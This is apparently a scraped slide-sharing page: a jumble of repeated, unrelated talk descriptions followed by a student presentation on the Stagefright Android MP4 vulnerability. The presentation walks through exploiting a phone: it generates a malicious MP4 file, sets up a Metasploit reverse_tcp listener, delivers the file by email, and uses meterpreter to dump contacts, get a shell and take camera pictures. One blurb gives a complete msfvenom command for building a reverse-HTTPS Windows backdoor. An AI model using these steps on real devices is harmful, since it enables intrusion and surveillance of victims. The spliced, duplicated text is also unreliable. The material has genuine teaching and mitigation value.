The document discusses the Stagefright vulnerability in Android devices. It describes how a specially crafted MP4 file can exploit a bug in the Stagefright media library and execute remote code on Android devices without any action from the user. The vulnerability affected over 95% of Android devices. It explains how the exploit works by triggering a buffer overflow using malformed MP4 chunks, and demonstrates compromising an Android device by sending a malicious MP4 file that establishes a reverse TCP connection to give the attacker access to files, contacts and the camera on the victim's device.
linux device drivers: Role of Device Drivers, Splitting The Kernel, Classes of
Devices and Modules, Security Issues, Version Numbering, Building and Running Modules
Kernel Modules Vs. Applications, Compiling and Loading, Kernel Symbol Table,
Preliminaries, Interaction and Shutdown, Module Parameters, Doing It in User Space.
linux device drivers: Role of Device Drivers, Splitting The Kernel, Classes of
Devices and Modules, Security Issues, Version Numbering, Building and Running Modules
Kernel Modules Vs. Applications, Compiling and Loading, Kernel Symbol Table,
Preliminaries, Interaction and Shutdown, Module Parameters, Doing It in User Space.
Agenda:
Have you ever wondered what happens when the kernel fires up? What is going on under the hood before init process is executed?
This talk will go into great depths explaining the entire process. From linker tricks and init sections to mounting and locating the init process to execute.
Speaker:
Boaz Taitler, experienced kernel developer.
JMI Techtalk: 한재근 - How to use GPU for developing AILablup Inc.
이 Techtalk에서는 AI 개발을 위해 GPU를 사용할 때 Nvidia가 제공하는 성능 향상을 위한 다양한 방법들을 기술자료들과 함께 소개합니다. 특히 Volta 아키텍처를 기반으로 Mixed precision을 도입하여 성능을 향상하는 과정에 관한 내용을 자세히 다룹니다.
This Techtalk introduces a variety of ways to improve the performance that Nvidia provides when using the GPU for AI development, along with technical resources. In particular, this talk discusses the process of improving performance by introducing mixed precision based on the Volta architecture.
The Log4Shell Vulnerability – explained: how to stay secureKaspersky
On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228 or “Log4Shell” is a RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control over an infected system. The vulnerability has been ranked a 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by malicious attackers to exploit Log4Shell.
What should companies or organizations do?
Join Marco Preuss, Head of Europe’s Global Research and Analysis (GReAT) team, Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion on Log4Shell and a live Q&A session.
To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh
In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:
Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Android graphic system (SurfaceFlinger) : Design Pattern's perspectiveBin Chen
SurfaceFlinger is a vital system service in Android system, responsible for the composting all the application and system layer and displaying them. In this slide,we looked in detail how surfaceFlinger was designed from Design Pattern's perspective.
Red Hat Certified Engineer (RHCE) EX294 Exam QuestionsStudy Material
Do you want to succeed in attaining Red Hat Certified Engineer (RHCE) in one shot? Dumpspedia can do that for you. It’s no joke! We have fantastic set of several RedHat Practice Test Questions Answers to choose from. All of them extracted directly from Red Hat Certified Engineer (RHCE) exam for Red Hat Enterprise Linux 8 Test Questions. EX294 Test Questions are verified and authentic with possibilities highest as they come to be on your actual exam. We put your satisfaction on top while making a perfect collection of valid EX294 Practice Questions. Join us on our website to have a better insight.
https://www.dumpspedia.com/EX294-dumps-questions.html
My #hacktrickconf presentation about Joshua Drake's Stagefright vulnerability.
This is the English version of my presentation:
http://www.slideshare.net/oguzhantopgul/androidin-yeni-kabusu-medya-dosyalari-media-files-androids-new-nightmare-52578473
I tried to explain the details of CVE-2015-1538, P0004, Google Stagefright ‘stts’ MP4 Atom Integer Overflow Remote Code Execution vulnerability
Stagefright affects over 90% of Android devices and will cause one of the largest security update. However, many news reports in Japan were flawed and caused confusions.
Agenda:
Have you ever wondered what happens when the kernel fires up? What is going on under the hood before init process is executed?
This talk will go into great depths explaining the entire process. From linker tricks and init sections to mounting and locating the init process to execute.
Speaker:
Boaz Taitler, experienced kernel developer.
JMI Techtalk: 한재근 - How to use GPU for developing AILablup Inc.
이 Techtalk에서는 AI 개발을 위해 GPU를 사용할 때 Nvidia가 제공하는 성능 향상을 위한 다양한 방법들을 기술자료들과 함께 소개합니다. 특히 Volta 아키텍처를 기반으로 Mixed precision을 도입하여 성능을 향상하는 과정에 관한 내용을 자세히 다룹니다.
This Techtalk introduces a variety of ways to improve the performance that Nvidia provides when using the GPU for AI development, along with technical resources. In particular, this talk discusses the process of improving performance by introducing mixed precision based on the Volta architecture.
The Log4Shell Vulnerability – explained: how to stay secureKaspersky
On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228 or “Log4Shell” is a RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control over an infected system. The vulnerability has been ranked a 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by malicious attackers to exploit Log4Shell.
What should companies or organizations do?
Join Marco Preuss, Head of Europe’s Global Research and Analysis (GReAT) team, Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion on Log4Shell and a live Q&A session.
To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh
In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:
Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Android graphic system (SurfaceFlinger) : Design Pattern's perspectiveBin Chen
SurfaceFlinger is a vital system service in Android system, responsible for the composting all the application and system layer and displaying them. In this slide,we looked in detail how surfaceFlinger was designed from Design Pattern's perspective.
Red Hat Certified Engineer (RHCE) EX294 Exam QuestionsStudy Material
Do you want to succeed in attaining Red Hat Certified Engineer (RHCE) in one shot? Dumpspedia can do that for you. It’s no joke! We have fantastic set of several RedHat Practice Test Questions Answers to choose from. All of them extracted directly from Red Hat Certified Engineer (RHCE) exam for Red Hat Enterprise Linux 8 Test Questions. EX294 Test Questions are verified and authentic with possibilities highest as they come to be on your actual exam. We put your satisfaction on top while making a perfect collection of valid EX294 Practice Questions. Join us on our website to have a better insight.
https://www.dumpspedia.com/EX294-dumps-questions.html
My #hacktrickconf presentation about Joshua Drake's Stagefright vulnerability.
This is the English version of my presentation:
http://www.slideshare.net/oguzhantopgul/androidin-yeni-kabusu-medya-dosyalari-media-files-androids-new-nightmare-52578473
I tried to explain the details of CVE-2015-1538, P0004, Google Stagefright ‘stts’ MP4 Atom Integer Overflow Remote Code Execution vulnerability
Stagefright affects over 90% of Android devices and will cause one of the largest security update. However, many news reports in Japan were flawed and caused confusions.
Building an Android Scale Incident Response ProcessPriyanka Aash
The Android ecosystem has over one billion active devices from hundreds of OEMs and carrier networks. The Android Security Team will explain how the ecosystem is able to respond quickly and effectively to security incidents. This will be part historical analysis of actual incidents, such as the Stagefright vulnerabilities, and part data-focused analysis of technology and processes we developed.
(Source: RSA USA 2016-San Francisco)
The tool has been developed to be used inside a Linux environment. At the host system level, the only prerequisites are support for Python 2,7 or higher and the Android SDK.
The ability to deliver a great speech in public is the skill, which is highly regarded. Just the knowledge of the subject is not enough to make your speech a success. There are many more ingredients to it. It’s the ability to inform and keep the audience interested, which marks the success of speech. Think of the last memorable talk or presentation you attended. So, do you have to rack your brains to remember one? Sadly, most talks are easy to forget because they lack the impact, necessary for making it memorable for audience. A great public speaker has the power to spellbind the audience, invoke emotions, and even trigger reactions from them.
Outline:
a. MediaPlayer Subsystem
b. Related Files
c. MediaPlayer Frame of Playing Flow
-StageFright and AwesomePlayer Relatin
-AwesomePlayer Frame and Playing Flow
d. Simple Playing Implement
The Art of defence: How vulnerabilites help shape security features and mitig...Priyanka Aash
Information security is ever evolving, and Android's security posture is no different. Android users faces threats from a variety of sources, from the mundane to the extraordinary. Lost and stolen devices, malware attacks, rooting vulnerabilities, malicious websites, and nation state attackers are all within the Android threat model, and something the Android Security Team deals with daily. In this talk, we will cover the threats facing Android users, using both specific examples from previous Black Hat conferences and published research, as well as previously unpublished threats. For the threats, we will go into the specific technical controls which contain the vulnerability, as well as newly added Android N security features which defend against future unknown vulnerabilities. Finally, we'll discuss where we could go from here to make Android, and the entire computer industry, safer.
(Source: Black Hat USA 2016, Las Vegas)
There is No Server: Immutable Infrastructure and Serverless ArchitectureSonatype
Erlend Oftedal, Blank
Immutable infrastructure and serverless architectures have very interesting security properties. This talk will give an introduction to immutable infrastructure and serverless architecture and try to highlight some of the properties of such architectures. Next we will look at the positive effects this can have on the security of our systems, but also highlight some of the negative aspects and potential problems.
At the conclusion of this sessions, we hope to have shed some light on the positive and negative security effects of such architectures.
Symantec Mobile Security Whitepaper June 2011Symantec
Symantec Corp. announced the publication of "A Window Into Mobile Device Security: Examining the security approaches employed in Apple’s iOS and Google’s Android." This whitepaper conducts an in-depth, technical evaluation of the two predominant mobile platforms, Apple’s iOS and Google’s Android, in an effort to help corporations understand the security risks of deploying these devices in the enterprise.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Rahul Sasi
In 2014 the actors behind global cyber espionage campaign “Operation NetTraveler” celebrate ten years of activity. NetTraveler has targeted more than 350 high-profile victims in 40 countries. So it is high time we make our research public .We were able to attribute Netravler to PLA[People liberation Army] military camp in Lanzhou. We provide our analysis in the form of a PPT slide.
Spyware triggering system by particular string valueIJERD Editor
This computer programme can be used for good and bad purpose in hacking or in any general
purpose. We can say it is next step for hacking techniques such as keylogger and spyware. Once in this system if
user or hacker store particular string as a input after that software continually compare typing activity of user
with that stored string and if it is match then launch spyware programme.
Sir I want to hack whatsapp chat ? Please give me a tutorial link. This question made me to write this simple POC tutorial to hack/steal whatsapp chats
http://www.ehacking.net/2014/09/poc-tutorial-of-stealing-whatsapp-chat.html
This tutorial is related to Hacking.Key terms: Introduction to Hacking,
History of Hacking,
The Hacker attitude,
Basic Hacking skills,
Hacking Premeasured,
IP Address,
Finding IP Address,
IP Address dangers & Concerns,
Hacking Tutorial
Network Hacking,
General Hacking Methodology,
Port Scanning,
ICMP Scanning,
Security Threats,
Counter-attack strategies,
Host-detection techniques,
Host-detection ping,
Denial of Service attacks, DOS Attacks,
Threat from Sniffing and Key Logging,
Trojan Attacks,
IP Spoofing,
Buffer Overflows,
All other types of Attacks, SMURF attacks, Sniffers, Keylogger, trojans,
Hacking NETBIOS,
Internet application security,
Internet application hacking statistics, Web application hacking reasons,
General Hacking Methods,
Vulnerability,
Hacking techniques,
XPath Injection
For more details visit Tech-Blog: https://msatechnosoft.in/blog/tech-blogs/
REMOTE SOLAR MONITORING SYSTEM - A solution to make battery life extend by 300%Mamoon Ismail Khalid
AIM OF PROJECT
Battery Monitoring System
Efficient usage of Battery
Integrating solar panel real time data with building computer
Storage of data
Like EGAUGE
METHODS OF S.O.C MEASUREMENT
Voltage Measurement
Specific Gravity Method
Quantum Magnetism
Integrated Current Method
PROBLEMS ASSOCIATED :
Better S.O.C Measurement :
Capacity changes :
Temperature
Depth Of Discharge Effect
Charge / Discharge cycles
Self Discharge
Charge Rate (C-Rate) dependence
HOW TO INCORPORATE THESE FACTORS ?
Piece Wise Linearization :
Temperature effect
C-Factor effect
Depth Of Discharge effect
Number Of Cycles effect
Incorporate these factors through feed back control into Simulink Model
Network Traffic Adaptable Image Codec - A solution to make streaming fasterMamoon Ismail Khalid
During online video streaming, if network congestion occurs, the resolution is
downscaled, leading to deteriorated video experience.
This occurs even when slight network congestion occurs.
For example streaming videos on youtube provides option of streaming in
480p, 360p, 240p etc.
Downscaling resolution greatly reduces the bandwidth, leaving some
bandwidth unused, leading to inefficiency.
Downscaling also results in deteriorated video quality, while some bandwidth
is still unused and could have been utilized.
Proposed Solution
Keep resolution constant and vary coding parameters, e.g. macro-block size, quantization
step-size etc.
For example, assume a 1MBps channel bandwidth and a video streaming in 640*480 that needs
1.2 Mbps.
Traditional solution: reduce resolution to 320*240, requiring a bitrate of 0.6 Mbps, leaving 0.4
Mbps unused, and deteriorated video quality.
Proposed solution: Resolution remains same 640*480, adjust one parameter, required bandwidth
now: 0.9. Wasted:0.1Mbps, and enhanced video quality.
Hospital Management and Inventory Control Solution for Public Hospitals in De...Mamoon Ismail Khalid
Historic underinvestment in public health has left Ecuador
with one of the most inefficient health systems in the region.
The Problem
Little info sharing
The lack of interoperable
systems and records
management contributes to a
lack of understanding of public
health needs leads to
treatments that don't really
address overall health issues
Bureaucracy
Public health employees are
engaged in redundant
administrative tasks that divert
resources from patient care and
clog system
PAPER RECORDING OF INFORMATION
Medical assistants need to manually fill in 5
different records (1 per prescription), they
first do it in paper and then typed it in the
computer since the Wi-Fi is not reliable.
Excessive waits
Lead times for getting
appointments in and long
check in processes lead to
patients abandoning
preventative care that could
save money and improve
patient outcomes
Most people we surveyed
complained about lead time. It
becomes even more
aggravating when it’s an
emergency.
Abuse and waste
Inability to track prescriptions
and inventory offer opportunity
for abuse that undermines the
system's overall quality
The result:
Costly, Inefficient
and non-citizen
centric public
healthcare system
The result:
Costly, Inefficient
and non-citizen
centric public
healthcare system
AES is pioneering the transformation of solar installation to make it more accessible, efficient,
and scalable, thereby accelerating global decarbonization efforts. To achieve this vision, AES
has developed Atlas, a groundbreaking solar robot designed to enhance the speed, efficiency,
and safety of solar panel installation. Atlas will revolutionize the solar industry by automating
labor-intensive tasks, reducing costs, and improving project scalability
Start-up name ----> (crunchbase/Google api/Yahoo finance/LinkedIn) ---->extract features ----> classification----> analyze ------>, predict cross border expansion needs
Features:
Stage
Geography not at (to predict cross border readiness
Geography already at (to predict cross border readiness)
Number of employees (to predict cross border readiness)
Revenue stage (to predict investment need vs clientele need vs strategic partnership need)
Product stage (to predict manufacturer partnership etc.)
Corporations name ----> (crunchbase/Google api/Yahoo finance/LinkedIn) ---->extract features ----> classification----> analyze ------>, predict cross border expansion needs
Features:
Industry in at
Industries/categories in that cluster
Possible problems they could face to keep up with tech singularity
Employees worldwide
Geographies at and not at (to predict whether they have access to VCs or entrepreneurship ecosystems like Israel NYC Silicon Valley and China(Szehnzen))
Competitors in China-
When they say solution intro - keyword pick up and run search on jing data to retrieve all relevant results ---> input into “Competitors field”
Matching criteria:
Matching algorithm:
Goal: matching needs of international startups and china investors manufacturers etc
Data filtering:
Filter by participation goal: look for a company in need of capital raise? Partners? Business acceleration?
Filter by Industry/categories
Filter by Funding stage
Filter by capital needed
Filter by company valuation
Filter by expansion timeline
Filter by location of the startups(city or country)
Search for Keywords (Or company name):
Match the word in the company description or product intro
Ideal providing format of data:
Filtered data ordered by relevance score or reliability score(professional background of team member)?
PlanA: Filter data(by category, participation goal, currency allowed,timeline) and score those filtered startups, and list the top ones
PlanB: Do not filter, score every startup, and list the top ones
Joint3DShapeMatching - a fast approach to 3D model matching using MatchALS 3...Mamoon Ismail Khalid
we extend the global optimization-based
approach of jointly matching a set of images to jointly
matching a set of 3D meshes. The estimated correspon
dences simultaneously maximize pairwise feature affini
ties and cycle consistency across multiple models. We
show that the low-rank matrix recovery problem can be
efficiently applied to the 3D meshes as well. The fast
alternating minimization algorithm helps to handle real
world practical problems with thousands of features. Ex
perimental results show that, unlike the state-of-the-art
algorithm which rely on semi-definite programming, our
algorithm provides an order of magnitude speed-up along
with competitive performance. Along with the joint shape
matching we propose an approach to apply a distortion
term in pairwise matching, which helps in successfully
matching the reflexive sub-parts of two models distinc
tively. In the end, we demonstrate the applicability of
the algorithm to match a set of 3D meshes of the SCAPE
benchmark database
Attempted implementation of the following paper:
" GOLFPOSE:GOLFSWINGANALYSESWITHAMONOCULARCAMERABASEDHUMAN
POSEESTIMATION
Zhongyu Jiang1⋆, Haorui Ji2⋆, Samuel Menaker2 and Jenq-Neng Hwang1
1Dept. Electrical & Computer Engineering , University of Washington
2SPORTSBOX.AI INC.
zyjiang@uw.edu, haoruij@sportsbox.ai, samm@sportsbox.ai, hwang@uw.edu
ABSTRACT
With the rapid developments of computer vision and deep
learning technologies, artificial intelligence takes a more and
more important role in sports analyses. In this paper, to at
tain the objective of automated golf swing analyses, we pro
pose a lightweight temporal-based 2D human pose estimation
(HPE) method, called GolfPose, which achieves improved
performance than the state-of-the-art image-based HPE meth
ods. Unlike traditional image-based methods, our temporal
based method, designed for efficient and effective golf swing
analyses, takes advantage of the temporal information to im
prove the estimation accuracy of fast-moving and partially
self-occluded keypoints. Furthermore, in order to make sure
the golf swing analyses can run on mobile devices, we op
timize the model architecture to achieve real-time inference.
With around 10% of the parameters and half of the GFLOPs
used in the state-of-the-art HRNet, our proposed GolfPose
model can achieve 9.16 mean pixel error (MPE) in our golf
swing dataset, compared with 9.20 MPE for HRNet. Further
more, the proposed temporal-based method, facilitated with
golf club detection(GCD), significantly improves the accu
racy of keypoints on the golf club from 13.98 to 9.21 MPE.
Index Terms— SportsAnalysis, HumanPoseEstimation,
Golf Swing, Line Segment Detection"
There is an increased global
awareness that a modern
economy cannot reach its full
potential without nurturing the
innovation of its entrepreneurs,
and that realization enhances
the prospects for venture capital.
I am very passionate about using investment strategies combined with leveraging political and
corporate support to create radical social transformation and new markets in the developing world.
Since past year I have been compiling a set of ideas that IF implemented with the right
partnerships - can turnaround the fate of any developing country.
Please note that in this document we take the example of Pakistan. However the thesis underlying
the suggestions embedded in this document holds true in the author's opinion for other
developing countries/regions as well. Some of the ideas listed here are inspired from my work of
consulting governments and large corporations across LatAm and China. In my years of being an
investor in the U.S venture capital industry, I have had the privilege to meet entrepreneurs, Venture
Capitalists, innovation thought leaders etc. from 50+ countries (Germany, UK, Israel, India,
Singapore,Turkey, France, China, Saudi Arabia, Dubai, Iran, etc. etc.). I can safely conclude that the
secret recipe to the success of U.S. economy and military might lies, to a major credit, in the
thought leadership and effective capital market of venture capital. Most smart countries I have
worked with have figured out tailored cross border investment strategies to be involved in the U.S
innovation ecosystem. Developing countries can learn from some these examples and replicate to
achieve great outcomes
Returnable Plastics Ecosystem
Latin America’s first returnable plastics ecosystem which recycle and replaces
the 100 billion plastics products used in El-Salvador and Vietnam every year.
This is a multi-phased solution which leverages to incentivize the average consumer to follow better sorting habits (particularly sorting organic and in- organic waste separately), towards the goal of being able to extract valuable waste items from the value chain in a manner that leads to cost savings compared to the status quo methodologies.
1) Partnerships with
ecosystem
stakeholders
(corporations, and government)
2) Sophisticated
technology (computer vision, RFIDs/QR
codes, sensor, networks)
3) Business model
Innovation
(reward mechanism for good
sorting habits among consumers)
Future of agriculture agriculture - technology is a necessity in 2020 and beyondMamoon Ismail Khalid
The pace of change is accelerating with technological advances, innovative business models, and changing consumer preferences. Many of the world’s leading industries are grinding to a halt as governments across the globe attempt to thwart the further spread of Covid-19. Industries that involve bringing large numbers of people together physically are bearing the brunt, including sporting events, restaurants, education, and tourism.
But there are a few that have been deemed essential to everyday life, including healthcare, emergency services, food manufacturing, and farming.
Researched improvements on increasing efficiency of organic solar cells by utilizing and modifying the Purdue University researchers NanoMOS MATLAB simulations
https://nanohub.org/resources/1305?rev=1
There are opportunities for blockchain in many facets of commercial real estate transactions including property and title searches, financing, leasing, purchasing and selling, due diligence, managing cash flows, and payment management, including cross-border transactions.
In this document we focus on the the use cases and merits as pertinent to raising capital via Digital Initial Public Offering.
Cohort analysis is an important analysis that VC can utilize to understand the LTV and expected revenue a e-commerce/subscription driven startup can expect to generate.
A compilation of all the articles and sources I have found useful to value early stage (including pre-revenue) startups.
Sources of compiled information:
• UpCounsel https://www.upcounsel.com/startup-valuation-methods
• http://billpayne.com/wp-content/uploads/2011/01/Scorecard-Valuation-Methodology-Jan111.pdf
• https://www.investopedia.com/terms/d/dcf.asp
• https://en.wikipedia.org/wiki/Cost_of_capital
• http://andrewchen.co/how-to-measure-if-users-love-your-product-using-cohorts-and-revisit-rates/
• http://www.perceptualedge.com/articles/guests/intro_to_cycle_plots.pdf
Detect Negative and Positive sentiment in user reviews using python word2vec ...Mamoon Ismail Khalid
detect Negative and Positive Sentiment in User Reviews_using Python word2vec model
libraries used:
Unsupervised training
from gensim.models.doc2vec import TaggedDocument
from gensim.models import Doc2Vec
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score
import numpy as np
workflows can be made my efficient by upto 80% in the early stage venture investing process using google APIs, App Script and few other softwares .
----------------------------------------------------------------------------------------------------------------------
Written, Ideated, Implemented by Mamoon Ismail Khalid | mik279@Nyu.edu
2. Android is very modular operating
system. Everything run in separate
processes. There are lots of
inter-process communications. Android
implementts concept of "Sandbox" -
modified scheme based on Linux users
and groups .
The security hole is in android's core
media handling library - libstagefright .
libstagefright executes inside "MEDIA
SERVER" .
Android Architecture
OVERVIEW
3. The Stagefright vulnerability was first identified
by security copmany Zimperium in July 2015. The
exploit is able to execute remote code on Android
devices and possibly affected upward of 95% of
android devices.
Stagefright itself is a software library
(libstagefright), written in C++, that's built inside
the the Android operating system. The analysis
says it is susceptible to memory corruption and
when a MMS message containing a video was
sent to the device it could, if composed in the
correct way, activate malicious code inside the
device. The exploit is so dangeorus that it can
compromise victim's phone without any action
being taken from victim -Just by sending a plane
MMS. MMSauto retrieves makes it really easy to
exploit android phones. So, who has your phone
number? Google has released a patch to the bug
now. But new development in form of another
exploit based on libstagefright has surfaced,
known as metaphor.
STAGEFRIGHT EXPLAINED
4. The mediaserver process runs in the background. It's a native service that's started at boot from
/init.rc: As such, the process automatically restarts when it crashes.
PROCESS ARCHITECTURE
Process Privileges (Nexus 5) The last part of the service definition in /init.rc shows the privileges
that the service runs with:
This service is highly privileged. Normal android apps cannot request/receive permissions like
audio, camera, drmrpc, and mediadrm.
Below set of access to media server - can give almost unlimited access.
- inet: can create AF_INET and AF_INET6 sockets (attacker can use this to connect to any hosts
on internert)
- net_bt and net_bt_admin: Attacker can access and configure bluetooth on victim device.
camera: An attacker can leverage this to control victims camera devices(front and back cam)
- audio : An attacker can leverage this to record, playback and monitor audio.
5. An attacker can also control storage on victims phone, can reboot adb and get shell access. An
attacker can also monitor system server.
The MPEG-4 File Format: To understand stagefright vulnerability(CVE-2015-1538) , It will be good
to understand structure of an MP4 file. Is a collection of TLV (Type-Length-Value) chunks. This
encoding method means there?s a value called ?type?specifying the chunk type, a ?length?value of
the data length and a ?chunk?value of the data itself.
For MPEG-4, the encoding ?length?is first, then comes ?type?and in the end ?value?. The following
pseudo-Cdescribes the MPEG-4 chunk format:
When length is 0, data reaches to end of the file. The atom field is a short string ( also called FourCC)
which describes the type of chunk. MPEG-4 chunk which have more information than 2^32 bytes
have different structure compared to above TLV. w
6. So how does this all happen?
AwesomePlayer.cpp is a program written in
C++, which processes when the media file is
played in victims phone. Let's jump into
code where the bug effects.
It calls
setDataSource_l( sp<MediaExtractor>).
setDataSource_l :
It will call MPEG4Extractor::countTracks:
Above code, calls readMetaData :
Above code, calls MPEG4Extractor, lets look
into that.
7. This is where the attack takes place - when
the mp4 file is parsed.
The code from MPEG4Extactor.cpp - will
collect all chunks and appends them into
one singular buffer. The problem here is
that there is no check on size and
chunk_size (they are unchecked). The
attacker in stagefright exploits an interger
overflow.
Above code snippet, the output in size bytes
from data will be written to buffer
irrespective of the actual allocated size of
buffer.
When heap is carefully shaped, the
exploitation can be done very easily. In this
project, we will be using exploit from
exploit-db from Joshua drake of Zimperium
labs. Joshua was first to reveal stagefright
vulnerability.
8. CVE-2015-1538
It's a python program exploit, which does the
integer overflow and makes a heap overflow. The
python exploit will generate a malicious mp4 file,
with chunks, size which will make mediaplayer
crash and it will reboot again as root.
The mp4 file payload also has Attacker's IP
address and port on which it will listen on reverse
TCPconnection.
Define arguments, so as host for back connection
and port number can be defined. This will be used
to establish a reverse_tcp connection from
victims phone to attacker machine.
This exploit can also be found on Joshua's Github.
9. Attacker's Machine: We have used Kali linux as attacker machine, due to its flexibility in suing
metasploit to manage reverse TCPfrom victim's phone.
DEVICES USED
Victim phone: We have used one emulated android device on virtual box and one real android
device. We have used two devices as victim.
a) Emulated Android device on virtualbox: Android 4.3 b) Real android phone: (not updated to 5.1)
10. We have used Stagefright detector app on our machine to see if it is vulnerable to stagefright
CVE-2015-1538 and the app shows that it's vulnerable.
11. So, how to leverage the exploit CVE-2015-1538 to generate the mp4 file.
- Set up attacker machine b) generate malicious mp4 file
- Start a listener (reverse_tcp) on attacker machine
- Send the file using attack vectors.
- Keep playing after attacker has got the connection.
STEP 1- Set up attacker machine: Check IP address of attacker machine: We have used Kali
Linux as attacker machine to compromise victim android phone.
THE ACTUAL ATTACK
Kali linux : 192.168.1.245 | Port to listen : 4444
STEP 2- Generate malicious mp4 file eight:The generated MP4 file can be seen in below screen
shot - funny.mp4 a
12. STEP 3- Start a listener on attacker machine: There are many alternatives to use be it netcat or
metasploit. In this project we have used metasploit to to listen on to reverse tcp and perform
numerous operations. Metasploit gives lt more functionality in contrast to other utilities, we can
get a meterpreter session and perform numerous tasks from accessing cameras, to mic, to get
shell access, list process etc.
Let's choose the exploit which we are going to use. Here we are just using handler which can
receive a connection back from victim phone.
Setting up a reverse_tcp payload, to receive back connection. Now the configuration needs to be
defined. such as LHOST,LPORT(attacker's IPand port to listen on.
After the configuration is set, we need to trigger the listener by using exploit keyword. After being
triggered, it will wait for any back connection coming from victim phone to attacker machine at port
4444 which we configured in the malicious mp4 file.
13. STEP 4- Send the file to victim using numerous attack vectors: In general, number of attack
vector is more than 11. MMS: The most dangerous is using MMS, the media file is auto
downloaded in victim's phone and parsed thereby victim phone will be compromised without victim
knowing it. Web Browser: Attacker can embed malicious mp4 file in a web link, which it could send
to victim. If user clicks on the link - the reverse tcp is established.
Browser auto download: If browser has capability to auto download a media file. The victim's phone
could be compromised. Email: Sending the malicious mp4 file as an email attachment to victim.
Social networks: Chat clients such as hangouts, Whatsapp, Facebook messenger can be used to
send the link. if auto download is enabled, then victim's phone is compromised. SD card: If attacker
has physical access to victim's SD card, it can load mp4 file in sd card, when mounted, it will
compromise victim's phone. There are many such possiblities to deliver the mp4 file to victim. The
vulnerable code present in mp4 file is invoked many times in Android system. Whenever a
thumbnail is rendered or metadata is needed. Rotating the screen, launching the Messaging app ,
opening Gallery, sharing malicious mp4/media and many more.
In this project we have used, Email as attack vector. For victim device we have used - a virtual
android
14. The Mediaserver crashes when playing the video and restarts as root. This sends a back
connection to our attacker machine, which is waiting for a connection.
STEP 5- Keep playing after attacker has got the connection: After the victim has received the
mp4 file and has either downloaded or auto downloaded. Our metasploit gets a back connection
and opens a meterpreter session.
15. Meterpreter session has been opened, we can check whatever processes are running on victim's
phone. The command used is ps.
Let's check ipaddress and interface details of our victim phone.
16. Let's see if we can pull out system info of our victim's
phone. sysinfo command in meterpreter provides us
system details.
An attacker can also get shell access to victim's phone:
An attacker can check folders and files
on android filesystem by giving ls
command in shell .
Check if the device is rooted.
An attacker can also dump contacts from victim's
phone.
17. Let's look into the contacts dump file.
An attacker can also control the camera. Webcam_list gives the list of camera available on the
device. On our emulated device, there is only back camera configured, with no actual hardware.
Let's take a picture from emulated android's camera.
18. - Update the device:
Update your device to latest version of released update. If the update is no t available for a
specific device, Install android OSlike CyanogenMod.
- Turn off auto download:
Partial mitigation is to turn off auto download of media files on all file sharing apps, social media
apps, MMS, Browser. This will only protect from the media file executing the remote code
automatically, but there are chance is user clicks on the video/downloads the mp4 file.
